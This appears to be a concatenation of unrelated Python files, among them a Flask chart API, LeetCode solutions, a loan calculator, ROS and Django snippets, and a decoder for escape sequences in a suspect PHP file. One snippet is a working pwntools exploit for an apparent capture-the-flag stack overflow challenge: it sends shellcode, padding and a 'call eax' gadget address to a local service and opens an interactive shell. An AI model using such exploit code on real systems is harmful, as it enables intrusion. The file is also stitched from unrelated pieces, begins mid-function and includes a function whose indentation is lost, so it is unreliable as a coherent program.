            _ecdf = df_obj._prep_ecdf(x)
            # print(_ecdf[0])
            # _prep_ecdf returns a (flag/count, frame) pair; only columns with
            # a positive first element are included.  NOTE(review): the exact
            # meaning of _ecdf[0] is defined in the functions module — confirm.
            if _ecdf[0] > 0:
                _ecdf = _ecdf[1].to_dict(orient='records')
                ecdf['Colnames'].append(x)
                ecdf['Values'].append({x:_ecdf})
                # descriptions
                if result[result.col_name == x].break_percent.values[0] is not None:
                    description = description + 'ซึ่งมีค่าอัตราการการกระจายของข้อมูลอยู่ที่ {0:.2f} %'.format(result[result.col_name == x].break_percent.values[0])
                ecdf['Descriptions'].append({x:description})
    return ecdf
def time():
    # do time series analysis
    # test with supermarket dataset
    # Pairs every 'date' column with every 'numeric' column and emits one
    # time-series payload per pair.
    time = {'Colnames':[],'Values':[],'Descriptions':[]}
    # print("time")
    col = df_obj.data_type
    # create new best solution later
    time_col = col[(col.col_type == 'date')].col_name.values
    numeric_col = col[(col.col_type == 'numeric')].col_name.values
    # print(time_col)
    # print(numeric_col)
    for t in time_col:
        for n in numeric_col:
            name = t+','+n
            temp = df_obj.df[[t,n]]
            temp.columns = ['x','y']
            # Serialize the dates for the JSON payload.  NOTE(review): this
            # assigns into a slice of df_obj.df (SettingWithCopy risk).
            temp['x']= temp['x'].dt.strftime('%Y-%m-%d')
            # print(temp.head())
            test_time = functions.Timeanalyze(temp)
            # print(test_time.x)
            # Stationarity test result is only logged, not returned.
            print(name+' is '+str(test_time._isStationarity()))
            test_time._ETS()
            temp = temp.to_dict(orient='records')
            time['Colnames'].append(name)
            time['Values'].append({name:temp})
            time['Descriptions'].append({name:"กราฟนี้แสดงการเปลี่ยนแปลงตามเวลา"})
    # return time, {'Access-Control-Allow-Origin': '*'}
    return time
class Data(Resource):
    """REST resource serving chart payloads built from the uploaded dataset.

    Relies on the module-global df_obj created by Upload.post().
    """

    def get(self):
        # The 'arg1' query parameter selects the chart type; anything else
        # (or no argument) returns every chart with its raw Values stripped.
        parser = reqparse.RequestParser()
        parser.add_argument('arg1', type=str)
        args = parser.parse_args()
        args1 = args['arg1']
        if args1 == 'distribution':
            return distribution(), {'Access-Control-Allow-Origin': '*'}
        elif args1 == 'scatter':
            return scatter(), {'Access-Control-Allow-Origin': '*'}
        elif args1 == 'heatmap':
            return heatmap(), {'Access-Control-Allow-Origin': '*'}
        elif args1 == 'boxplot':
            return boxplot(), {'Access-Control-Allow-Origin': '*'}
        elif args1 == 'bar_cat':
            return bar_cat(), {'Access-Control-Allow-Origin': '*'}
        elif args1 == 'ecdf':
            return ecdf(), {'Access-Control-Allow-Origin': '*'}
        elif args1 == 'time':
            return time(), {'Access-Control-Allow-Origin': '*'}
        elif args1 == 'bar_num':
            #not finished
            bar_num = {'Colnames':[],'Values':[],'Descriptions':[]}
            return bar_num, {'Access-Control-Allow-Origin': '*'}
        elif args1 == 'line':
            #not finished
            line = {'Colnames':[],'Values':[],'Descriptions':[]}
            return line, {'Access-Control-Allow-Origin': '*'}
        elif args1 == 'test':
            test = {'Test':''}
            return test, {'Access-Control-Allow-Origin': '*'}
        else:
            # Summary mode: compute every chart but drop the (potentially
            # large) raw 'Values' lists to keep the response small.
            all_graph = {
                'Heatmap':{'Colnames':[],'Values':[],'Descriptions':[]},
                'Distribution':{'Colnames':[],'Values':[],'Descriptions':[]},
                'Scatter':{'Colnames':[],'Values':[],'Descriptions':[]},
                'Boxplot':{'Colnames':[],'Values':[],'Descriptions':[]},
                'Bar_cat':{'Colnames':[],'Values':[],'Descriptions':[]},
                'Ecdf':{'Colnames':[],'Values':[],'Descriptions':[]},
                'Time':{'Colnames':[],'Values':[],'Descriptions':[]}
            }
            all_graph['Heatmap'] = heatmap()
            all_graph['Heatmap']['Values'] = []
            all_graph['Distribution'] = distribution()
            all_graph['Distribution']['Values'] = []
            all_graph['Scatter'] = scatter()
            all_graph['Scatter']['Values'] = []
            all_graph['Boxplot'] = boxplot()
            all_graph['Boxplot']['Values'] = []
            all_graph['Bar_cat'] = bar_cat()
            all_graph['Bar_cat']['Values'] = []
            all_graph['Ecdf'] = ecdf()
            all_graph['Ecdf']['Values'] = []
            all_graph['Time'] = time()
            all_graph['Time']['Values'] = []
            return all_graph, {'Access-Control-Allow-Origin': '*'}
        # next step is time series variable
        # NOTE(review): unreachable — every branch above returns.
        return "success", {'Access-Control-Allow-Origin': '*'}

    def post(self):
        # Replace df_obj's column-type table (and optional target) with the
        # client-supplied metadata, then recompute the derived tables.
        # print(request.is_json)
        data = json.loads(request.get_data().decode("utf-8"))
        # data = pd.DataFrame(list(data.items()), columns=df_obj.data_type.columns)
        df_obj.data_type = pd.DataFrame(data['data'])
        if "target" in data:
            print("have target")
            df_obj.target = data['target']
        else:
            print("not have target")
        df_obj.data_comb = df_obj._data_combinator()
        df_obj.cat_count = df_obj._cat_unique_count()
        # print(df_obj.data_comb)
        # print(df_obj.cat_count)
        return "success", {'Access-Control-Allow-Origin': '*'}
# for Upload CSV data
class Upload(Resource):
    """CSV upload endpoint; builds the module-global df_obj used by Data."""

    def get(self):
        # Return the inferred column-type table as a list of records.
        # print(df_obj.data_type.to_dict(orient='records'))
        return df_obj.data_type.to_dict(orient='records'), {'Access-Control-Allow-Origin': '*'}
        # return jsonify({'status': 'ok', 'data': df_obj.df.to_dict(orient='split')}), {'Access-Control-Allow-Origin': '*'}

    def post(self):
        # Parse the uploaded CSV and (re)build the shared analysis object.
        file = request.files['file']
        # global data
        data = pd.read_csv(file)
        # global df
        global df_obj
        df_obj = functions.Data_prep(data)
        # print(df_obj.data_comb[(df_obj.data_comb.col_1_type == "numeric") & (df_obj.data_comb.col_2_type == "numeric")])
        # print("scatter plot length is %d"%len(df_obj.data_comb[(df_obj.data_comb.col_1_type == "numeric") & (df_obj.data_comb.col_2_type == "numeric")].loc[:, ['col_1_name','col_2_name']].values.tolist()))
        # show numeric type columns
        # print("histogram length is %d"%len(df_obj.data_type[df_obj.data_type.col_type == "numeric"].col_name.to_list()))
        # Stash the column-combination table in the user session.
        data_to_session = df_obj.data_comb.to_dict(orient='records')
        session['data'] = data_to_session
        return "success", {'Access-Control-Allow-Origin': '*'}
#!/usr/bin/env python
from socket import *
from time import ctime
# Listen on all interfaces, UDP port 8080, 1 KiB receive buffer.
HOST = ''
PORT = 8080
BUFSIZE = 1024
ADDR = (HOST, PORT)

# UDP (datagram) timestamping echo server — Python 2 script.
ServerSocket = socket(AF_INET, SOCK_DGRAM)
ServerSocket.bind(ADDR)

while True:
    print 'waiting for message...'
    data, addr = ServerSocket.recvfrom(BUFSIZE)
    if not data:
        # Empty datagram terminates the server loop.
        break
    # Echo the payload back to the sender, prefixed with the current time.
    ServerSocket.sendto('[%s] %s' % (ctime(), data), addr)
    print '...received from and returned to:', addr

ServerSocket.close()
|
#python script to run open pos for ap
# Read the SQL script and split it into individual statements on ';'.
fileHandle = open('C:\\ap_weekly_04222016.sql', 'r')
yourResult = fileHandle.read().replace('\n',' ').split(';')
fileHandle.close()
# Strip whitespace and drop empty entries.  Fix: the original deleted items
# from yourResult while iterating it with enumerate, which skips the element
# that follows every deletion; building a new list is safe and equivalent.
yourResult = [statement.strip() for statement in yourResult if statement.strip()]
def getLastQuery(theList):
    """Return the index of the last element of *theList*.

    The original loop ("if z > maxNum: maxNum = z" over enumerate) simply
    computed len(theList) - 1, returning 0 for an empty or one-element list;
    that behavior is preserved.
    """
    return max(len(theList) - 1, 0)
import pandas as pd
import pyodbc
import logging

#create database connection
fh=pyodbc.connect(dsn='financial_hast',charset='utf-8',use_unicode=True)
fh.autocommit=True

# Execute every statement except the last; the last statement is the SELECT
# whose result set gets exported to the weekly CSV reports.
m=getLastQuery(yourResult)
for i,y in enumerate(yourResult):
    if i<m:
        query=y
        # Substitute any {name} placeholders from the local namespace.
        query=query.format(**locals())
        fh.execute(query)
        print('step '+str(i)+ ' for the query' + ' is done!\n')
    if i==m-1:
        # Preceding statements done: run the final query into a DataFrame.
        dftemp=pd.read_sql_query(yourResult[m].format(**locals()),fh)
        try:
            # If df already exists append to it, otherwise the bare name
            # raises NameError and the except branch starts it fresh.
            df
            df=df.append(dftemp)
            df.to_csv('H:\Adv_Mkt Dept\Generated_Reports\\Weekly\AP_Open.csv',index=False)
            df.to_csv('H:\Adv_Mkt Dept\Generated_Reports\\Jeff\AP_Open.csv',index=False)
        except NameError:
            df=dftemp
            df.to_csv('H:\Adv_Mkt Dept\Generated_Reports\\Weekly\AP_Open.csv',index=False)
            df.to_csv('H:\Adv_Mkt Dept\Generated_Reports\\Jeff\AP_Open.csv',index=False)
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from utils.opts import opt
from scipy import stats
import numpy as np
from PIL import Image
# Input dimensions
# Square model input (height, width) taken from the parsed options.
image_dims = (opt.im_size, opt.im_size)
# Full input shape: (height, width, channels).
input_shape = image_dims + (opt.channels,)
def resize(arr, target_size=image_dims, resample_method='bilinear'):
    """
    Resize the given image to the target size.

    :param arr: Image in numpy.ndarray format.
    :param target_size: Tuple giving the target shape: (height, weight).
    :param resample_method: Interpolation method; 'bilinear' or 'nearest'.
    :return: Resized image as a numpy.ndarray.
    :raises NotImplementedError: for any other resample method.
    """
    methods = {'bilinear': Image.BILINEAR, 'nearest': Image.NEAREST}
    if resample_method not in methods:
        raise NotImplementedError("Only 'bilinear' and 'nearest' resample methods available")
    resample = methods[resample_method]
    return np.array(Image.fromarray(arr).resize(target_size, resample=resample))
def normalize_image(img, dtype='f'):
    """
    Normalize an image to [0, 1] (dtype 'f', float result) or to [0, 255]
    (dtype 'u'/'i', np.uint8 result).

    Fix: the original divided by (max - min) unconditionally, producing
    NaNs (and runtime warnings) for constant images; a constant image now
    normalizes to all zeros.

    :param img: An image as a numpy.ndarray.
    :param dtype: 'f' for [0, 1]; 'u' or 'i' for [0, 255] uint8.
    :return: The normalized image array.
    :raises TypeError: for any other dtype code.
    """
    span = img.max() - img.min()
    if span == 0:
        # Constant image: define its normalization as all zeros.
        scaled = np.zeros_like(img, dtype=np.float64)
    else:
        scaled = (img - img.min()) / span
    if dtype == 'f':
        return scaled
    elif dtype in ('u', 'i'):
        return (scaled * 255).astype(np.uint8)
    else:
        raise TypeError("dtype can be either 'u', 'i' for [0, 255] images or 'f' for [0, 1].")
def repeat3(img):
    """
    Stack an array three times along a new trailing axis.

    :param img: A numpy.ndarray.
    :return: A numpy.ndarray with a shape of: img.shape + (3,)
    """
    return np.stack((img, img, img), axis=-1)
def percentile(arr, percent):
    """
    Return the value lying on the *percent*-th percentile of *arr* (i.e.
    *percent* percent of the values fall below it).

    Simplification: the original computed
    ``arr.min() + stats.iqr(arr, rng=(0, percent))``; since
    ``iqr(rng=(0, p))`` is Q(p) - Q(0) and Q(0) is the minimum, that is
    exactly the p-th percentile (both use linear interpolation), so
    np.percentile gives the same value without the scipy dependency.

    :param arr: An array (numpy.ndarray).
    :param percent: A percentile (int in (0, 100)).
    :return: The value that lies on the given percentile.
    """
    return np.percentile(arr, percent)
|
#!/usr/bin/env python2
from pwn import *
# Target is a 32-bit Linux binary.
context(arch = 'i386', os = 'linux')

# Distance from the start of the vulnerable stack buffer to the saved
# return address (0x88 bytes plus 4 — presumably the saved EBP; confirm
# against the binary).
RET_OFFSET = 0x88 + 4
# Address of a "call eax" gadget in the target used as a trampoline into
# the buffer.
CALL_EAX_INSTRUCTION_LOCATION = 0x080486e6
# Shellcode that reuses the existing socket to spawn a shell.
SHELLCODE = asm(shellcraft.findpeersh())
# Layout: shellcode, 'A' padding up to the return address, gadget address.
PAYLOAD=flat(SHELLCODE, "A" * (RET_OFFSET - len(SHELLCODE)), CALL_EAX_INSTRUCTION_LOCATION)

r = remote("localhost", 6655)
# Consume the service banner before sending the payload.
# NOTE(review): recvline() has no prompt parameter — the strings passed here
# act only as a truthy keepends flag and document the expected banner lines.
r.recvline("Hello and welcome to this small trampolining challenge.")
r.recvline("byte stack buffer.")
r.send(PAYLOAD)
r.interactive()
|
import re
def read(file):
    """Return the entire text content of *file*."""
    with open(file, "r") as handle:
        return handle.read()
def decode(string):
    """Resolve octal escapes first, then hex escapes, in *string*."""
    without_octal = decode_oct(string)
    return decode_hex(without_octal)
def decode_hex(hex_string):
    """Replace printable ``\\xNN`` hex escapes in *hex_string* with their
    characters."""
    hex_escape = "(\\\\x[0-9a-f]{2})"
    return decode_pattern(hex_string, hex_escape, 16, 2)
def decode_oct(oct_string):
    """Replace printable 2-3 digit octal escapes in *oct_string* with their
    characters."""
    oct_escape = "(\\\\[0-7]{2,3})"
    return decode_pattern(oct_string, oct_escape, 8, 1)
def decode_pattern(encoded_string, pattern, base, offset):
    """Replace every escape matched by *pattern* with its character.

    *base* interprets the digits (16 for hex, 8 for octal) and *offset* is
    how many leading characters of a match to skip before the digits.  Only
    printable ASCII codes (32..126) are substituted; each matched escape is
    replaced globally throughout the string.
    """
    decoded_string = encoded_string
    for matched in re.findall(pattern, encoded_string):
        code = int(matched[offset:], base)
        if 31 < code < 127:
            replacement = chr(code)
            print("Replace : " + matched + " => " + replacement)
            decoded_string = decoded_string.replace(matched, replacement)
    return decoded_string
def main():
    # Dump the suspect PHP file raw, then with its hex/octal escape
    # sequences decoded to readable characters.
    data = read("hack_3.php")
    print(data)
    print(decode(data))

main()
|
# -*- encoding:utf-8 -*-
# __author__=='Gan'
# You are given a map in form of a two-dimensional integer grid where 1 represents land and 0 represents water.
# Grid cells are connected horizontally/vertically (not diagonally). The grid is completely surrounded by water,
# and there is exactly one island (i.e., one or more connected land cells). The island doesn't have "lakes"
# (water inside that isn't connected to the water around the island). One cell is a square with side length 1.
# The grid is rectangular, width and height don't exceed 100. Determine the perimeter of the island.
# Example:
# [[0,1,0,0],
# [1,1,1,0],
# [0,1,0,0],
# [1,1,0,0]]
# Answer: 16
# Explanation: The perimeter is the 16 yellow stripes in the image below:
# 5833 / 5833 test cases passed.
# Status: Accepted
# Runtime: 228 ms
# Your runtime beats 93.92 % of python submissions.
class Solution(object):
    def islandPerimeter(self, grid):
        """
        Count land cells and shared edges: each land cell contributes 4
        sides and every adjacent pair of land cells hides 2 of them, so the
        perimeter is lands * 4 - neighbours * 2.

        Fix: guard against an empty grid (the original indexed grid[0]
        unconditionally and raised IndexError); an empty grid has
        perimeter 0.

        :type grid: List[List[int]]
        :rtype: int
        """
        if not grid or not grid[0]:
            return 0
        rows, cols = len(grid), len(grid[0])
        lands = neighbours = 0
        for row in range(rows):
            for col in range(cols):
                if grid[row][col]:
                    lands += 1
                    # Count each right and down neighbour pair exactly once.
                    if col < cols - 1 and grid[row][col + 1]:
                        neighbours += 1
                    if row < rows - 1 and grid[row + 1][col]:
                        neighbours += 1
        return lands * 4 - neighbours * 2
# Boundary and water.
# 5833 / 5833 test cases passed.
# Status: Accepted
# Runtime: 322 ms
# Your runtime beats 55.99 % of python submissions.
class Solution(object):
    def islandPerimeter(self, grid):
        """
        For every land cell, count its exposed sides: a side is exposed when
        it touches the grid boundary or a water cell.

        :type grid: List[List[int]]
        :rtype: int
        """
        rows, cols = len(grid), len(grid[0])

        def exposed_sides(r, c):
            # One exposed side per boundary touch or water neighbour.
            sides = 0
            if r == 0 or not grid[r - 1][c]:
                sides += 1
            if r == rows - 1 or not grid[r + 1][c]:
                sides += 1
            if c == 0 or not grid[r][c - 1]:
                sides += 1
            if c == cols - 1 or not grid[r][c + 1]:
                sides += 1
            return sides

        return sum(exposed_sides(r, c)
                   for r in range(rows)
                   for c in range(cols)
                   if grid[r][c])
class Solution(object):
    def islandPerimeter(self, grid):
        """
        Scan every row and every column: each maximal run of land cells
        contributes exactly 2 to the perimeter (its two end edges), so the
        total over rows and over columns is the full perimeter.

        :type grid: List[List[int]]
        :rtype: int
        """
        total = 0
        for lines in (grid, zip(*grid)):
            for line in lines:
                pending = 0
                for cell in line:
                    if cell == 1:
                        # Inside a run: its two end edges are pending.
                        pending = 2
                    else:
                        # Run ended at water: commit its two edges.
                        total += pending
                        pending = 0
                # Commit a run that reaches the end of the line.
                total += pending
        return total
if __name__ == '__main__':
    # Smoke tests; expected perimeters are 16, 8, 8 and 4 respectively.
    print(Solution().islandPerimeter(
        [[0, 1, 0, 0],
         [1, 1, 1, 0],
         [0, 1, 0, 0],
         [1, 1, 0, 0]]
    ))
    print(Solution().islandPerimeter(
        [[1, 1],
         [1, 1]]
    ))
    print(Solution().islandPerimeter(
        [[1, 0],
         [0, 1]]
    ))
    print(Solution().islandPerimeter(
        [[1]]
    ))
|
from django.db import models
class Tweet(models.Model):
    """A captured tweet with engagement metrics."""
    # Twitter's numeric status id (64-bit, hence BigIntegerField).
    twt_id = models.BigIntegerField()
    username = models.CharField(max_length=50)
    # When this row was stored locally (set automatically on insert).
    created = models.DateTimeField(auto_now_add=True)
    # Raw created_at string as delivered by the API.
    created_at = models.TextField()
    # created_at converted to a datetime, when available.
    adjusted_time = models.DateTimeField(null=True, blank=True)
    text = models.TextField()
    retweet_count = models.IntegerField(null=True)
    favorite_count = models.IntegerField(null=True)
    # Popularity value set elsewhere — TODO confirm semantics (flag vs score).
    popular = models.IntegerField(null=True, blank=True)

    class Meta:
        # Newest captures first by default.
        ordering = ['-created']

    def __str__(self):
        return self.username
|
#!/usr/bin/env python
import rospy
from geometry_msgs.msg import Twist
class move():
    """Drive the turtlesim turtle in a circle until ROS shuts down."""

    def __init__(self):
        # rospy.init_node returns None; the assignment is kept as-is.
        pub =rospy.init_node('ControlTurtleBot', anonymous=False)
        # Stop the robot cleanly when the node is shut down.
        rospy.on_shutdown(self.shutdown)
        self.cmd_vel=rospy.Publisher('/turtle1/cmd_vel', Twist, queue_size=10)
        r = rospy.Rate(10)
        # Constant forward speed plus a steady turn yields a circular path.
        twist = Twist()
        twist.linear.x = 2
        twist.angular.z = 0.5
        while not rospy.is_shutdown():
            print("aaa")
            self.cmd_vel.publish(twist)
            # Fix: the original wrote "r.sleep" without calling it, so the
            # loop spun unthrottled instead of publishing at 10 Hz.
            r.sleep()

    def shutdown(self):
        # Publish a zero-velocity Twist so the robot stops, then give ROS a
        # moment to deliver it before the node exits.
        self.cmd_vel.publish(Twist())
        rospy.sleep(1)
if __name__ == '__main__':
    # Constructing move() starts publishing immediately and blocks until
    # ROS shutdown.
    move()
|
import database_conversion as dbc
import subprocess
import sys, os

# Download the database dump, then run the audio conversion script.
#
# BUG FIX: the original called os.system(command) with `command` never
# defined (NameError at import time) and subprocess.run(input=...) with no
# command arguments (TypeError).  Run the script explicitly instead.
dbc.download()
subprocess.run(["./audio-convert.sh"])
|
"""
The Metro Bank provides various types of loans such as car loans, business loans and house loans to its account holders. Write a python program to implement the following requirements:
Initialize the following variables with appropriate input values:account_number, account_balance, salary, loan_type, loan_amount_expected and customer_emi_expected.
The account number should be of 4 digits and its first digit should be 1.
The customer should have a minimum balance of Rupees 1 Lakh in the account.
If the above rules are valid, determine the eligible loan amount and the EMI that the bank can provide to its customers based on their salary and the loan type they expect to avail.
The bank would provide the loan, only if the loan amount and the number of EMI’s requested by the customer is less than or equal to the loan amount and the number of EMI’s decided by the bank respectively.
Display appropriate error messages for all invalid data. If all the business rules are satisfied, then display the account number, the eligible and requested loan amounts, and the EMIs.
Test your code by providing different values for the input variables.
+---------+-----------+----------------------+--------------------------------+
| Salary | Loan type | Eligible loan amount | No. of EMI’s required to repay |
+---------+-----------+----------------------+--------------------------------+
| > 25000 | Car | 500000 | 36 |
+---------+-----------+----------------------+--------------------------------+
| > 50000 | House | 6000000 | 60 |
+---------+-----------+----------------------+--------------------------------+
| > 75000 | Business | 7500000 | 84 |
+---------+-----------+----------------------+--------------------------------+
"""
def calculate_loan(account_number,salary,account_balance,loan_type,loan_amount_expected,customer_emi_expected):
    """Validate a loan request and print the bank's decision.

    Args:
        account_number: 4-digit account number whose first digit is 1 (1000-1999).
        salary: customer's monthly salary (rupees).
        account_balance: current balance; must be at least 1 lakh (100000).
        loan_type: one of "Car", "House", "Business".
        loan_amount_expected: loan amount requested by the customer.
        customer_emi_expected: number of EMIs requested by the customer.

    Prints the approval details, or an error message for the first rule that
    fails.  Returns None (output is the contract, matching the original).
    """
    # Bank policy table: loan type -> (minimum salary, max amount, max EMIs).
    # Replaces three copy-pasted branches with identical print logic.
    loan_rules = {
        "Car": (25000, 500000, 36),
        "House": (50000, 6000000, 60),
        "Business": (75000, 7500000, 84),
    }
    # Guard clauses, checked in the same order as the original nesting.
    if not (999 < account_number < 2000):
        print("Invalid account number")
        return
    if account_balance < 100000:
        print("Insufficient account balance")
        return
    rule = loan_rules.get(loan_type)
    if rule is None or salary <= rule[0]:
        print("Invalid loan type or salary")
        return
    _, eligible_loan_amount, bank_emi_expected = rule
    if loan_amount_expected <= eligible_loan_amount and customer_emi_expected <= bank_emi_expected:
        print("Account number:", account_number)
        print("The customer can avail the amount of Rs.", eligible_loan_amount)
        print("Eligible EMIs :", bank_emi_expected)
        print("Requested loan amount:", loan_amount_expected)
        print("Requested EMI's:", customer_emi_expected)
    else:
        print("The customer is not eligible for the loan")
#Test your code for different values and observe the results
# Sample: valid account, Car loan, request within limits -> approval printed.
calculate_loan(1001,40000,250000,"Car",300000,30)
|
#import statements
from globals import friends
from spy_details import Spy
from termcolor import colored
from spy_details import spy
#FUNCTION FOR ADDING A FRIEND
def add_friend():
    """Interactively collect one friend's details and append to `friends`.

    Python 2 code (raw_input).  Re-prompts on blank name, blank/invalid
    salutation, and blank age.  NOTE(review): an out-of-range age prints a
    farewell and terminates the whole program via exit() rather than
    re-prompting — confirm that is intended.
    Returns the new number of friends.
    """
    # Using the class spy
    new_friend = Spy(" ", " ", 0, 0.0)
    while True:
        new_friend.name = raw_input("Please add your friend's name:- ")
        if len(new_friend.name)>0:
            while True:
                new_friend.salutation = raw_input("Are they Mr. or Ms. ?:- ")
                if len(new_friend.salutation)>0:
                    if (new_friend.salutation == 'ms.' or new_friend.salutation == 'Ms.' or new_friend.salutation == "Mr." or new_friend.salutation == "mr."):
                        # ask for the age of the friend
                        while True:
                            new_friend.age = raw_input("Age?:- ")
                            # Type casting to integer
                            if len(new_friend.age) > 0:
                                new_friend.age = int(new_friend.age)
                                if 18 < new_friend.age < 50:
                                    # After the conditions are satisfied the friend will be added
                                    friends.append(new_friend)
                                    print(colored('FRIEND ADDED!', "magenta"))
                                else:
                                    # NOTE(review): terminates the application
                                    # instead of re-prompting for a valid age.
                                    print (colored("Sorry but your age is not valid for spy!", 'red'))
                                    print(colored("            THANK YOU!            ", 'yellow'))
                                    exit()
                                return len(friends)
                                #application will terminate
                                # The no of friends the spy has will be returned.
                                # The no of friends the spy has will be returned.
                            else:
                                print (colored("Sorry but age cannot be blank!", 'red'))
                        # The no of friends the spy has will be returned.
                    else:
                        print(colored('Please enter valid salutation!', 'red'))
                else:
                    print(colored('Salutation cannot be blank!','red'))
        else:
            print(colored('Name cannot be blank!','red'))
    # NOTE(review): unreachable — the `while True` above only exits via
    # return or exit().
    return len(friends)
# Count whitespace-separated words in a single line read from stdin.
test_string = input()
words = test_string.split()
print(len(words))
|
import readline
from sdt.shapes.shape_factory import ShapeFactory
# Register the factory's shape types before main() calls drawTriangle.
ShapeFactory.initialize()
def main():
    """Interactively classify triangles until the user presses Ctrl-C."""
    print('Hello, I am a smart robot who will help you check the type of a triangle')
    while True:
        try:
            # Read all three sides first (as the original did), then convert:
            # a non-numeric entry only errors after all prompts are shown.
            raw_sides = [input('Please inform a number to value {}:'.format(label))
                         for label in ('A', 'B', 'C')]
            sides = [int(value) for value in raw_sides]
            triangle_type = ShapeFactory.drawTriangle(*sides).getType()
            print("### RESULT ### - {}".format(triangle_type))
        except Exception:
            print("### ERROR ### - please just inform numbers")
        except KeyboardInterrupt:
            print('\nBye bye')
            break


if __name__ == "__main__":
    main()
|
# -*- encoding:utf-8 -*-
# __author__=='Gan'
# Given a singly linked list, determine if it is a palindrome.
# Follow up:
# Could you do it in O(n) time and O(1) space?
# Definition for singly-linked list.
class ListNode(object):
    # Minimal singly-linked list node: payload plus next pointer.
    def __init__(self, x):
        self.val = x
        self.next = None
# Solution 1: Reversed first half == second half
# phase 1: Reverse the first half while finding middle.
# phase 2: Compare the reversed first half with the second half.
class Solution(object):
    def isPalindrome(self, head):
        """
        :type head: ListNode
        :rtype: bool

        O(n) time, O(1) space: reverse the first half in place while the
        hare finds the middle, then compare the reversed prefix against the
        second half.  NOTE: the list is left mutated (first half reversed).
        """
        hare = tortoise = head
        rev = None  # The last node is None.
        while hare and hare.next:
            hare = hare.next.next
            # Simultaneous assignment: RHS is evaluated first, so this pops
            # `tortoise` onto the reversed prefix `rev` and advances it —
            # the order of the three targets is load-bearing.
            rev, rev.next, tortoise = tortoise, rev, tortoise.next
        # Odd length: skip the middle node before comparing.
        tortoise = tortoise.next if hare else tortoise
        while tortoise and tortoise.val == rev.val:
            tortoise = tortoise.next
            rev = rev.next
        # Palindrome iff the comparison consumed the whole second half.
        return not tortoise
# Solution 1: Reversed first half == second half
# phase 1: Reverse the first half while finding middle.
# phase 2: While comparing the two halves, restore the list to its original state by reversing the first back.
# !! play nice!!!!!
class Solution(object):
    # NOTE(review): this second `Solution` shadows the one defined above
    # when the module is imported; only this variant is visible to callers.
    def isPalindrome(self, head):
        """
        :type head: ListNode
        :rtype: bool

        Same reversed-first-half comparison as above, but restores the list
        to its original order while comparing (re-reversing the prefix).
        """
        hare = head
        rev = None  # The last node is None.
        while hare and hare.next:
            hare = hare.next.next
            # Pop `head` onto the reversed prefix `rev`; target order matters.
            rev, rev.next, head = head, rev, head.next
        # Odd length: the second half starts one past the middle node.
        tail = head.next if hare else head
        while rev and tail.val == rev.val:
            # Compare and simultaneously push `rev` back onto `head`,
            # restoring the original links.
            head, head.next, rev = rev, head, rev.next
            tail = tail.next
        return not rev
if __name__ == '__main__':
    # Build the list 1 -> 2 -> 2 -> 1 and check it reads the same both ways.
    values = [1, 2, 2, 1]
    head = ListNode(values[0])
    node = head
    for val in values[1:]:
        node.next = ListNode(val)
        node = node.next
    print(Solution().isPalindrome(head))

# 26 / 26 test cases passed.
# Status: Accepted
# Runtime: 142 ms
# Your runtime beats 54.12 % of python submissions.
|
# Inputs for the subset-count demo: count subsets of `wt` summing to W.
wt = [1, 2, 3, 3]
W = 6
n = len(wt)
def subsetSum(W, wt, n):
    """Return how many subsets of wt[:n] sum to exactly W (0/1 subset-sum DP)."""
    # counts[j] = number of subsets of the items seen so far that sum to j.
    # The empty subset gives counts[0] = 1.
    counts = [1] + [0] * W
    for item in wt[:n]:
        # Walk j downward so each item is counted at most once per subset.
        for j in range(W, item - 1, -1):
            counts[j] += counts[j - item]
    return counts[W]
print(subsetSum(W, wt, n))
|
'''
Draw Star Assignment '''
# Part I
def draw_stars(arr):
    """Print one line per entry of arr, each consisting of entry-many '*'s."""
    for count in arr:
        # String repetition replaces the original manual while-loop append.
        print('*' * count)
x = draw_stars([4, 6, 1, 3, 5, 7, 25])
# Part II
def draw_stars2(arr):
    """Like draw_stars, but a string entry prints its lowercased first letter
    repeated len(entry) times; an int entry prints that many '*'s."""
    for item in arr:
        if isinstance(item, str):
            # item[:1] (not item[0]) keeps the original's empty-string
            # behavior: '' prints an empty line instead of raising.
            print(item[:1].lower() * len(item))
        elif isinstance(item, int):
            print('*' * item)
x = draw_stars2([4, "Tom", 1, "Michael", 5, 7, "Jimmy Smith"])
|
# Sum of the decimal digits of (too1 + too2), assuming the sum has at most
# three digits (original comment in Mongolian: "digit sum of 3-digit number").
too1 = input("too1: ")
too2 = input("too2: ")
total = int(too1) + int(too2)
print(total // 100 + total // 10 % 10 + total % 10)
import util
import pyutil
def getRanges(count, forHistory = False):
ret = []
minimum = 35
minrequired = 250
i = 3 if forHistory else 1
last = (count % minimum)
end = 0
while ((i * minimum) + minrequired < count):
start = ((i-1) * minimum)
end = ((i) * minimum) + minrequired
ret.append([start, end])
i += 1
start = ((i-1) * minimum)
tend = start + last + minrequired + minimum
if tend <= count:
ret.append([start, tend])
else:
ret[-1][-1] = count
return ret
def standard():
    """Generate the standard report set into ./foobar as filename_* files."""
    report_dir = "foobar"
    report_name = "filename_"
    pyutil.clearDir(report_dir, report_name)
    # Use cached data rather than re-downloading from Yahoo.
    util.saveProcessedFromYahoo.download = False
    stocks = util.getStocks(dev=True)
    for start, end in getRanges(util.getNumberOfDates()):
        util.report(stocks, start=start, end=end,
                    reportname=report_name,
                    reportdir=report_dir)
def historical():
    """Generate grouped historical reports (15 ranges per group, group 6 on)."""
    where = "history"
    # pyutil.clearDir(where)
    util.getStocks.totalOverride = True
    stocks = util.getStocks()
    ranges = getRanges(util.getNumberOfDates(), forHistory=True)
    grouping = 0
    for index, (start, end) in enumerate(ranges):
        # A new group begins every 15 ranges (first iteration opens group 1).
        if index % 15 == 0:
            grouping += 1
        # Earlier groups were already produced by previous runs; skip them.
        if grouping < 6:
            continue
        util.report(stocks, start=start, end=end,
                    reportname="{}_{}_".format(where, grouping),
                    reportdir=where)
    return where
#historical()
|
import numpy as np

# Demonstrate several equivalent formulations of elementwise / row products.
matrix = np.array([[1., -3., 15., -466.], [1., 2., 3., 4.]])
print(matrix * matrix)                            # elementwise square
print(np.square(matrix))                          # same values via ufunc
print(np.inner(matrix, matrix))                   # 2x2 row-by-row dot products
print(np.dot(matrix, np.transpose(matrix)))       # identical to inner here
print(np.sum(matrix * matrix, axis=0))            # column sums of squares
print(np.diag(np.sum(matrix * matrix, axis=0)))   # ...as a diagonal matrix
|
from SignalGenerationPackage.SignalController import SignalController
from SignalGenerationPackage.Sinus.SinusSignal import SinusSignal
from SignalGenerationPackage.Sinus.SinusObserver import SinusObserver
from SignalGenerationPackage.Sinus.SinusAmplitudeCallBackOperator import SinusAmplitudeCallBackOperator
